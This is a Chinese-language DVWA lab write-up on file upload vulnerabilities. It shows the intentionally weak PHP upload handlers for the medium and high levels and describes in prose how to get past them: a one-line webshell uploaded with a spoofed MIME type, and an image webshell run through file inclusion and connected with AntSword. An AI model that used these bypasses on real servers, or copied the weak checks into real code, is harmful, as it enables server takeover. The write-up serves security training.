文件上传漏洞
若服务端脚本语言未对上传的文件进行严格的过滤,会导致用户上传木马、病毒或恶意脚本,从而获得服务端的控制权限。
medium
<?php
//判断是否非空
if( isset( $_POST[ 'Upload' ] ) ) {
// 确定上传文件目录
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// 获取文件信息
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];//文件名
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];//文件类型
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];//文件大小
// 判断文件类型是否为jpeg、png,并且文件大小<100K
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// 判断文件是否移动到指定位置
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
关键函数解释
move_upliaded_file:将上传的文件移动到新位置,这里表示移动到指定目录。
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// 将文件移动到指定目录,"!"取反表示如果没有这样做
echo '<pre>Your image was not uploaded.</pre>';
} //上传失败
else {
echo "<pre>{$target_path} succesfully uploaded!</pre>";
} //上传成功
}
绕过
写一句话
上传时bp抓包,将类型修改为png后放包
上传成功
蚁剑成功连接
Hight
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// 设置文件上传的路径
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// $_FILES获取文件的信息
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];//文件名
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);//后缀名
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];//文件大小
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];//临时文件名
// 判断后缀名是否为jpg/jpeg/png,并且文件大小<100K
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// 判断文件是否移动到指定路径
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// 如果不符合后缀和大小则
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
关键函数解释
strrpos:返回一个字符串在另一个字符串最后一次出现的位数(注意字符串是从0开始而不是1)
substr:通过指定长度来截取字符串,通过和上一个函数的配合截取出后缀名
绕过
将一张普通图片和php脚本copy出一个包含木马的图片
文件上传成功
这里需要利用文件包含漏洞来执行php脚本,将上传的图片位置贴到文件包含漏洞利用处,访问后会返回一堆乱码即成功。
打开蚁剑添加url和密码
这里还需要将网页的cookie贴到请求信息中的请求头中
完成后成功连接